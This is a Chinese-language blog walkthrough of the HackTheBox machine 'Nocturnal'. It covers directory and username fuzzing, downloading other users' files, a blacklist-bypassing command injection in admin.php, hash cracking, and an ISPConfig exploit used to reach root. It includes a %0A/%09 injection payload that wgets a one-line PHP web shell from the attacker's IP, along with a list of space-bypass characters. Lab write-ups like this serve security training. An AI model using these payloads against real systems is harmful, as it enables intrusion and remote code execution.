r3tr0's blog
0%

HTB-nocturnal

Posted on Edited on In
Symbols count in article: 14k Reading time ≈ 13 mins.
尝试的一个非赛季machine,重新锻炼自己的ctf能力

HTB-nocturnal

User

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  nocturnal dirsearch -u http://nocturnal.htb/ --crawl

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /Users/r3tr0/hack/hackthebox/machines/nocturnal/reports/http_nocturnal.htb/__25-04-14_16-16-24.txt

Target: http://nocturnal.htb/

[16:16:24] Starting: 
[16:16:40] 302 -    0B  - /admin.php  ->  login.php
[16:16:49] 301 -  178B  - /backups  ->  http://nocturnal.htb/backups/
[16:16:50] 403 -  564B  - /backups/
[16:16:58] 302 -    0B  - /dashboard.php  ->  login.php
[16:17:07] 200 -  644B  - /login.php
[16:17:07] 200 -  649B  - /register.php
[16:17:07] 302 -    0B  - /logout.php  ->  login.php
[16:17:23] 403 -  564B  - /uploads
[16:17:23] 403 -  564B  - /uploads/affwp-debug.log
[16:17:23] 403 -  564B  - /uploads/
[16:17:23] 403 -  564B  - /uploads/dump.sql
[16:17:23] 403 -  564B  - /uploads_admin
[16:17:25] 302 -    3KB - /view.php  ->  login.php

Task Completed

网站存在登录以及注册的点,先注册一个用户,发现了文件上传的地点,上传完文件后,在浏览文件的链接处发现有用户名枚举并且可以下载任意用户上传的文件的漏洞,用ffuf爆破用户获得敏感信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
➜  nocturnal ffuf -u "http://nocturnal.htb/view.php?username=FUZZ&file=pwn.xlsx" -w /Users/r3tr0/hack/KaliLists/SecLists-master/Usernam
es/xato-net-10-million-usernames-dup.txt -H "Cookie: PHPSESSID=n3jb8nvahqclf3h6fe2af6qvdk" -fs 2985

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://nocturnal.htb/view.php?username=FUZZ&file=pwn.xlsx
 :: Wordlist         : FUZZ: /Users/r3tr0/hack/KaliLists/SecLists-master/Usernames/xato-net-10-million-usernames-dup.txt
 :: Header           : Cookie: PHPSESSID=n3jb8nvahqclf3h6fe2af6qvdk
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 2985
________________________________________________

admin                   [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 240ms]
amanda                  [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 101ms]
tobias                  [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 76ms]
retro                   [Status: 200, Size: 3115, Words: 1177, Lines: 129, Duration: 77ms]
nocturnal               [Status: 200, Size: 3116, Words: 1175, Lines: 129, Duration: 87ms]
admin123                [Status: 200, Size: 3279, Words: 1177, Lines: 129, Duration: 74ms]
sonnyc-Leclair#         [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 1921ms]
selm#at1-vatican1       [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 83ms]
n#3ton                  [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 79ms]
lumitrak                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 98ms]
luminus                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 99ms]
luminox                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
luminati                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 80ms]
luminary                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 80ms]
luminari                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
luminale                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 86ms]
luminarc                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 86ms]
luminal                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 86ms]
lumilode                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumierboss              [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 75ms]
lumie                   [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumes                   [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumi.hautaniemi         [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumens                  [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 79ms]
lumenica1               [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumene07                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lumenandrain            [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lumbur2                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 88ms]
lumen-rostik            [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 88ms]
lume2000                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 88ms]
lumbjmk                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumbertis               [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 74ms]
lumberman               [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 75ms]
lumberjk                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 75ms]
lumbergh55              [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumberjax61             [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumber1                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumbatzi                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumas1-scrw33           [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumaluma                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lum4life                [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lum6erjack              [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lulyapa                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lum100                  [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 79ms]
luly234                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
luly-wi                 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
luluz                   [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 101ms]
jdog#1                  [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 78ms]
gR##Efisher             [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 86ms]
gR##E                   [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 86ms]
dansss#1                [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 91ms]
dV1oG#eL                [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 75ms]
andy2977#               [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 91ms]
Joey#1                  [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 90ms]
AHasegawa#D             [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 76ms]
:: Progress: [624370/624370] :: Job [1/1] :: 465 req/sec :: Duration: [0:22:38] :: Errors: 1 ::

在amanda用户下发现了敏感文件,privacy.odt,里面有该用户的初始密码,密码登录admin入口处,发现了源码文件泄露,并且存在网站源码的备份下载,下载后在admin.php出发现可能存在命令注入漏洞,下面是admin.php的部份内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
<?php
session_start();

if (!isset($_SESSION['user_id']) || ($_SESSION['username'] !== 'admin' && $_SESSION['username'] !== 'amanda')) {
    header('Location: login.php');
    exit();
}

function sanitizeFilePath($filePath) {
    return basename($filePath); // Only gets the base name of the file
}

// List only PHP files in a directory
function listPhpFiles($dir) {
    $files = array_diff(scandir($dir), ['.', '..']);
    echo "<ul class='file-list'>";
    foreach ($files as $file) {
        $sanitizedFile = sanitizeFilePath($file);
        if (is_dir($dir . '/' . $sanitizedFile)) {
            // Recursively call to list files inside directories
            echo "<li class='folder'>📁 <strong>" . htmlspecialchars($sanitizedFile) . "</strong>";
            echo "<ul>";
            listPhpFiles($dir . '/' . $sanitizedFile);
            echo "</ul></li>";
        } else if (pathinfo($sanitizedFile, PATHINFO_EXTENSION) === 'php') {
            // Show only PHP files
            echo "<li class='file'>📄 <a href='admin.php?view=" . urlencode($sanitizedFile) . "'>" . htmlspecialchars($sanitizedFile) . "</a></li>";
        }
    }
    echo "</ul>";
}

// View the content of the PHP file if the 'view' option is passed
if (isset($_GET['view'])) {
    $file = sanitizeFilePath($_GET['view']);
    $filePath = __DIR__ . '/' . $file;
    if (file_exists($filePath) && pathinfo($filePath, PATHINFO_EXTENSION) === 'php') {
        $content = htmlspecialchars(file_get_contents($filePath));
    } else {
        $content = "File not found or invalid path.";
    }
}

function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}


?>

<?php
if (isset($_POST['backup']) && !empty($_POST['password'])) {
    $password = cleanEntry($_POST['password']);
    $backupFile = "backups/backup_" . date('Y-m-d') . ".zip";

    if ($password === false) {
        echo "<div class='error-message'>Error: Try another password.</div>";
    } else {
        $logFile = '/tmp/backup_' . uniqid() . '.log';
       
        $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " .  > " . $logFile . " 2>&1 &";
        
        $descriptor_spec = [
            0 => ["pipe", "r"], // stdin
            1 => ["file", $logFile, "w"], // stdout
            2 => ["file", $logFile, "w"], // stderr
        ];

        $process = proc_open($command, $descriptor_spec, $pipes);
        if (is_resource($process)) {
            proc_close($process);
        }

        sleep(2);

        $logContents = file_get_contents($logFile);
        if (strpos($logContents, 'zip error') === false) {
            echo "<div class='backup-success'>";
            echo "<p>Backup created successfully.</p>";
            echo "<a href='" . htmlspecialchars($backupFile) . "' class='download-button' download>Download Backup</a>";
            echo "<h3>Output:</h3><pre>" . htmlspecialchars($logContents) . "</pre>";
            echo "</div>";
        } else {
            echo "<div class='error-message'>Error creating the backup.</div>";
        }

        unlink($logFile);
    }
}

入口:

1
$command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " .  > " . $logFile . " 2>&1 &";

命令注入的黑名单部分

1
2
3
4
5
6
7
8
9
10
11
12
function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

尝试了strpos函数的绕过方法,但是没法绕过强比较类型,所以尝试其他方法

最后通过查询相关网页(偷看秘籍),发现可以通过换行符,以及特殊字符绕过

以下是可以绕过空格的字符集,在此记录一下

<,<>,%20(space),%09(tab),$IFS$9, I F S , {IFS},IFS,IFS
————————————————

                       版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_45655564/article/details/117395152

过滤了分号、&、|等常见的命令拼接方式可以尝试使用%0A换行符进行命令拼接

最后的payload:

1
2
3
4
5
6
# http://nocturnal.htb/admin.php
# 
password=%0Abash%09-c%09"wget%0910.10.16.21:81/s.php"%0A&backup=

# s.php
<?php echo `$_REQUEST[1]`; ?>

查询到上层目录中存在db文件,下载下来查看到存在用户密码哈希值,可以爆破也可以在网站上在线破解。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
➜  nocturnal hashcat -m 0 -a 0 '55c82b1ccd55ab219b3b109b07d5061d' /Users/r3tr0/hack/KaliLists/rockyou.txt 
hashcat (v6.2.6) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
             You have been warned.

METAL API (Metal 343.19)
========================
* Device #1: Apple M2, 5408/10922 MB, 8MCU

OpenCL API (OpenCL 1.2 (Apr 13 2024 11:09:23)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M2, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 140 MB

Dictionary cache built:
* Filename..: /Users/r3tr0/hack/KaliLists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse     
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 55c82b1ccd55ab219b3b109b07d5061d
Time.Started.....: Mon Apr 21 10:07:09 2025 (1 sec)
Time.Estimated...: Mon Apr 21 10:07:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/Users/r3tr0/hack/KaliLists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 24388.6 kH/s (5.23ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4194304/14344385 (29.24%)
Rejected.........: 0/4194304 (0.00%)
Restore.Point....: 3670016/14344385 (25.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: sn781225 -> rogans
Hardware.Mon.#1..: Util: 40%

Started: Mon Apr 21 10:07:03 2025
Stopped: Mon Apr 21 10:07:11 2025

得到用户登录凭证55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse ,ssh登录

Root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
tobias@nocturnal:~$ netstat -antpl
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 10.10.11.64:80          10.10.16.5:45398        FIN_WAIT2   -                   
tcp        0      0 127.0.0.1:8080          127.0.0.1:55550         TIME_WAIT   -                   
tcp        0      0 127.0.0.1:8080          127.0.0.1:39964         TIME_WAIT   -                   
tcp        0      0 10.10.11.64:22          10.10.16.21:63137       ESTABLISHED -                   
tcp        0    360 10.10.11.64:22          10.10.16.21:65192       ESTABLISHED -                   
tcp        0      0 10.10.11.64:80          10.10.16.5:58146        FIN_WAIT2   -                   
tcp        0      0 10.10.11.64:80          10.10.16.5:60798        FIN_WAIT2   -                   
tcp        0      0 127.0.0.1:8080          127.0.0.1:60292         TIME_WAIT   -                   
tcp        0      0 10.10.11.64:80          10.10.16.5:59680        FIN_WAIT2   -                   
tcp        0      0 10.10.11.64:22          10.10.16.22:64081       ESTABLISHED -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

发现内网开启了8080的服务,代理出来看一波

1
ssh tobias@nocturnal.htb -L 9090:127.0.0.1:8080

也可以用chisel等工具实现

发现是ispconfig的网站,刚好存在漏洞:https://sploitus.com/exploit?id=C8C641AC-8810-5B1B-878E-D064A44248BB

密码同样是user的密码,用户是admin,拿到root权限